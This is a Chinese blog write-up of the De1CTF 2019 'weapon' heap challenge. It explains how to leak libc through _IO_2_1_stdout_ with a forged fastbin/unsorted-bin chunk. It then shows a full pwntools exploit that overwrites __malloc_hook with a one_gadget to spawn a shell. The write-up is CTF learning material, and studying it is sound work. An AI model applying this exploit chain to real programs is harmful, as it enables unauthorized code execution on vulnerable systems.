De1CTF weapon 经验总结

最新推荐文章于 2024-05-23 12:38:45 发布
最新推荐文章于 2024-05-23 12:38:45 发布
阅读量746 收藏 2
点赞数
分类专栏: PWN
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43189757/article/details/102061355
版权

第一次接触通过利用_IO_2_1_stdout_ 来泄露libc地址的题目,中间碰到不少问题,在这里记录一下

1.泄露libc
由于程序限制了创建的堆块大小为0x60 以内,所以无法同通过创建一个大小能放入unsortedbin中的堆块,但是可以通过伪造一个大小符合unsortedbin中的堆块来泄露libc地址

具体步骤:
1.创建五个大小为0x20堆块 编号依次为0-5, 之后一次释放chunk0, chunk1
那么fastbin中的bin结构为
0x20:chunk1->chunk0-> …

2.修改chunk1的fd指针的低一位字节为’\x10’, 让chunk1的fd指针指向chunk0的data区, 之后再创建两个chunk,编号为6,7
那么chunk7 的地址就是chunk0 的data区的地址

3.修改chunk0的data区为p64(0) + p64(0x71) ,这样chunk7的大小被修改为0x71,再释放掉
那么fastbin中的bin结构为
0x70: &chunk7-> …

4.修改chunk0的data区为p64(0) + p64(0xb1), 处理方法同上
这是chunk7既存在于fastbin中又存在于unsortedbin中
这是修改chunk7 的fd指针的低两位字节’\xdd\xa5’,
为什么是0xa5dd?
libc-2.23版本的stdout的地址的低三位固定为0x620, 由于从fastbin分配堆块的时候会检查堆块的大小,若不符合则会出现memory corruption之类的作物,所以要在_IO_2_1_stdout_ 中伪造一个大小为0x71的堆块,而地址中的开头一个字节0x7f正好符合(低位是标志位,不计入大小), 用0x620 减去伪造的堆块的偏移即为0x5dd,
前面还有加a的原因是 由于地址随机化的原因,低三位字节可以确定,但是低位字节的第四位是随机的,要爆破,概率是十六分之一,挺高的
之后再chunk0 的堆块大小修改回0x71

5.之后再创建两个堆块,往_IO_2_1_stdout_ 中写入我们布置好的数据,
‘\x00’*0x33 + p64(0xfbad1800) + p64(0)*3 + ‘\x00’
在这里插入图片描述
至于为什么flags要覆盖位0xfbad1800 现在不清楚,没读过libc源码,打算之后去读libc源码,然后再回来搞懂这个问题

6.利用puts函数来输出libc地址

泄露libc地址之后就是常规的操作了,往malloc_hook中写入one_gadget 地址之后getshell

from pwn import *
import struct

context(arch='amd64', os='linux', log_level='debug')
debug = 0
d = 1

if debug == 0:
	p = process("./weapon")
	if d == 1:
		gdb.attach(p)

def create(size, index, name):
	p.sendlineafter("choice >>", "1")
	
	p.sendlineafter("wlecome input your size of weapon: ", str(size))
	p.sendlineafter("input index: ", str(index))
	p.sendafter("input your name:", name)

def delete(index):
	p.sendlineafter("choice >>", "2")
	
	p.sendlineafter("input idx :", str(index))

def rename(index, content):
	p.sendlineafter("choice >>", "3")

	p.sendlineafter("input idx: ", str(index))
	p.sendafter("new content:", content)

create(0x18, 0, "aaa")

create(0x18, 1, 'b'*0x10 + p64(0x21))

create(0x18, 2, "ccc")

create(0x18, 3, 'd'*0x10 + p64(0x71))

create(0x18, 4, "eee")

create(0x18, 5, "fff")

create(0x18, 7, "hhh")

delete(0)

delete(1)

rename(1, '\x10')

rename(0, p64(0) + p64(0x21))

create(0x18, 1, "bbb")

create(0x18, 8, "fff")

rename(0, p64(0) + p64(0x71))

delete(8)

rename(0, p64(0) + p64(0xb1))

delete(8)

rename(8, '\xdd\xa5')

rename(0, p64(0) + p64(0x71))

create(0x60, 4, "123456")

create(0x60, 4, 'emmm')

rename(4, '\x00'*0x33 + p64(0xfbad1800) + p64(0)*3 + '\x00')

p.recvuntil(p64(0xfbad1800) + p64(0)*3)
leak = p.recv(8)
leak = struct.unpack("<Q", leak)[0]
print "leak-> " + hex(leak)

elf = ELF("./weapon")
libc = ELF("/lib/x86_64-linux-gnu/libc-2.23.so")

libc_base = leak - (0x7f745811a600 - 0x7f7457d55000)
malloc_hook = libc_base + libc.symbols['__malloc_hook']
print "malloc_hook-> " + hex(malloc_hook)

one_gadget = libc_base + 0xf1147
'''
0x45216 execve("/bin/sh", rsp+0x30, environ)
constraints:
  rax == NULL

0x4526a execve("/bin/sh", rsp+0x30, environ)
constraints:
  [rsp+0x30] == NULL

0xf02a4 execve("/bin/sh", rsp+0x50, environ)
constraints:
  [rsp+0x50] == NULL

0xf1147 execve("/bin/sh", rsp+0x70, environ)
constraints:
  [rsp+0x70] == NULL
'''


create(0x60, 0, "emmmmmmmm")

delete(0)

rename(0, p64(malloc_hook - 0x23))

create(0x60, 0, "bbb")

create(0x60, 1, '\x00'*0x13 + p64(one_gadget))

p.sendlineafter("choice >>", "1")
p.sendlineafter("wlecome input your size of weapon: ", "1")
p.sendlineafter("input index: ", "2")

p.interactive()

参考链接:
利用stdout来处理无leak的堆题
从一题看IO_file to leak

苍崎青子
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CTF经验分享
10-14
该资源详细介绍了CTF比赛基本情况,描述了CTF比赛应该学习的思路
ByteCTF note_five 经验总结
qq_43189757的博客
10-10 799
每到接触新知识得时候总要花不少力气搞懂(汗,这题是关于改写global_max_fast 再通过fastbin attack来getshell, 总结一下学到的知识点和解题思路 思路: 这题限制了chunk的size, 大小为0x8f~0x0x400,在edit info 函数处存在 off-by-one 漏洞,通过这个漏洞可以改写chunk的size 一开始的思路是创建几个chunk,然后通过修...
CTF比赛总结(小白必看)
最新发布
qq_53272273的博客
05-23 1485
它被设计为tcpdump 和其他使用 libpcap 库的软件使用的原始 PCAP格式的可扩展继承者.目前,只有 Wireshark 可以读取和写入 PCAPNG 文件,而 libpcap(以及使用它的软件)只能读取其中一些文件。:用16进制编辑工具更改图片的高度,会只显示图片的一部分,下面的部分就被隐藏了,可以先看看图片的属性,得到宽高值,找表示宽度和高度的位置的再转成16进制。特征:文由0和1构成,可能由空格、tab或则其他字符分割,去掉这些分割后,0和1的总数是5的倍数。
de1ctf_2019_weapon
doudoudedi
05-06 706
这题我多了一个换行搞了老久了服了还是tcl 思路 有uaf通过写IO来得到libc地址然后通过double free来拿到shell exp: #!/usr/bin/python2 from pwn import * p=0 def pwn(): global p #p=process('./de1ctf_2019_weapon') p=remote('node3.buuoj.cn',292...
CTF网络攻防总结
Fantastic
02-11 6283
文章目录
De1CTF2020:De1CTF2020
02-18
De1CTF2020:一场技术的盛宴】 De1CTF2020是一场备受瞩目的网络安全竞赛,通常在CTF(Capture The Flag)领域内举办。CTF比赛是信息安全爱好者和专业人士展示技能、学习新知识并互相交流的平台。这种竞赛涵盖了多...
De1CTF.zip
07-20
De1CTF逆向 pwn等,除web,misc外均有
De1ctf 2020 -‘check in’ writeup
01-09
CTF(Capture The Flag)竞赛中,"De1ctf 2020 - ‘check in’" 是一道挑战性的安全题目,主要涉及到多个网络安全技术的综合运用,特别是与Web应用程序安全相关的方面。该题目的核心是通过理解并利用服务器配置中...
DE1-soc 内部资料
03-10
这有助于我们了解项目的整体发展脉络,从中学习项目管理和工程实践的经验。 标签“de1-soc”直接指明了主题,是该开发板的型号标识,方便搜索和归类相关资源。 在压缩包的文件名称列表中: 1. `Verify.md5` 和 `...
writeup:CTF挑战撰写
05-28
欢迎阅读我们的文章! 自2018年以来,r3kapig是一个统一的CTF团队,主要来自Eur3kA和... :2020 de1ctf写入 :0CTF / TCTF 2020质量报告 :GeekPwn云上挑战赛 20201020-n1ctf :N1CTF 2020撰写 20210111-rwctf-
de1ctf_2019_weapon (IO_FILE)
BengDouLove的博客
05-27 1030
这道题的方法对于我来说有点陌生,堆操作之后利用IO_FILE的相关知识,记录一下,以后还会有更多对于 IO 的利用 保护机制全开,所以常规方法肯定没办法 分析程序: 这是主程序 menu函数 create函数 逻辑是输入申请大小,在输入index,然后就写入chunk 没有任何检查,比如申请过的index不能用之类的 最简洁的申请函数 delete函数 同样是简洁的释放函数,而且有 uaf 漏洞 rename函数 改写chunk内容,写入的时候貌似没有溢出,但是 uaf 能用在这上面 程序看似
DelCTF2019 weapon WP
qq_41252520的博客
10-06 362
保护 分析 程序一共只有三个操作:增、删、改。又是没有泄露,看来又是利用IO_FILE泄露内存了。 漏洞还是很明显的,在删除操作中没有将free掉的指针置NULL 并且编辑的时候没有检测指针的合法性,因此形成了UAF。 在添加操作中限制了分配的大小 利用 程序中多处存在scanf函数,根据前面的文章可以知道,scanf可以帮我们得到一块unsortbin的chunk,我们构造的攻击链如...
[uaf + double free] de1ctf_2019_weapon
huzai9527的博客
09-22 322
[uaf + double free] de1ctf_2019_weapon 1. ida分析 删除的时候,只是检查了index范围,没有检查是否存在,存在double free 并且free后,指针没有置空,存在uaf 限制了chunk大小,需要通过uaf 构造fake chunk,修改chunk head的大小,构造unstored bin attack 2. 思路 1⃣️申请3个chunk 0,chunk 1,chunk 2,用chunk 0伪造chunk 1 的head,free chunk
de1ctf_2019_weapon(IO_leak,doublefree)
m0_51251108的博客
11-17 438
de1ctf_2019_weapon: 保护全开
de1ctf_2019_weapon【buuctf刷题】【stdout泄露libc、fastbin attack】
m0_73756460的博客
07-10 243
de1ctf_2019_weapon【buuctf刷题】【stdout泄露libc、fastbin attack】
SWPUCTF_2019_p1KkHeap(负溢出tcache)de1ctf_2019_weapon(IO_FILE泄露libc)
weixin_46521144的博客
08-04 375
SWPUCTF_2019_p1KkHeap IDA分析 用IDA反编译发现,此题操作有如下限制 顺便说一下,buu上的所有ubuntu18的题目都是带tcache-double-free的,其实这不太好,怕养成习惯这样解题。 这里可以看到的是,对delete和add有明显的次数限制,不能简单的tcache-poisoning来泄露libc。本题一开始也是卡在这里,没有别的思路。 之后参考了别人的wp,发现tcache的管理块其实存在一些漏洞。这里记录一下 // tcache结构定义中的部分代码 #if U
Pwn题中修改程序连接库的方法
Nothing
11-28 1737
Pwn的时候有时候会遇到题目的环境和本地环境不一致的情况。如果要装和远程环境相同的虚拟机就会比较麻烦,下面可以通过修改binary动态连接库的方法,强行让程序链接到与远程环境相同的库上。 1.首先下载好和远程环境相同的动态库,如libc-2.23.so;然后下载与之相符的链接器ld-2.23.so。有两个项目可以实现自动下载 libc:https://github.com/niklasb/lib...
[de1ctf 2019]ssrf me 1
03-16
好的,我来回答这个问题。 [de1ctf 2019]ssrf me 1 是一道关于SSRF的题目。它的目标是通过利用SSRF漏洞,访问位于内部网络中的一个HTTP服务,从而获取flag。 具体来说,题目中提供了一个Web应用程序,该应用程序允许用户输入一个URL,然后应用程序将请求发送到该URL,并将响应返回给用户。因此,我们可以在URL参数中输入我们想要访问的目标HTTP服务的地址,然后查看返回结果。 然而,为了防止应用程序被滥用,开发人员在应用程序中实现了一些安全措施。例如,应用程序会检查URL参数中是否包含一些不被允许的字符串,比如localhost、127.0.0.1等。此外,还有一些其他限制条件需要考虑。 因此,我们需要找到一种方法来绕过这些安全措施,从而成功访问目标HTTP服务。一种常见的技巧是使用一些特殊的URL协议,例如file协议、gopher协议等,来绕过安全检查。此外,我们还可以利用DNS rebinding攻击来绕过防御,但是需要特别注意,这种攻击可能涉及到一些法律和道德上的问题。 总之,这道题目需要具备一定的SSRF漏洞利用经验和技能,同时还需要对网络安全有一定的了解。如果你想进一步了解SSRF漏洞的原理和防御方法,可以查看相关的资料和教程。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值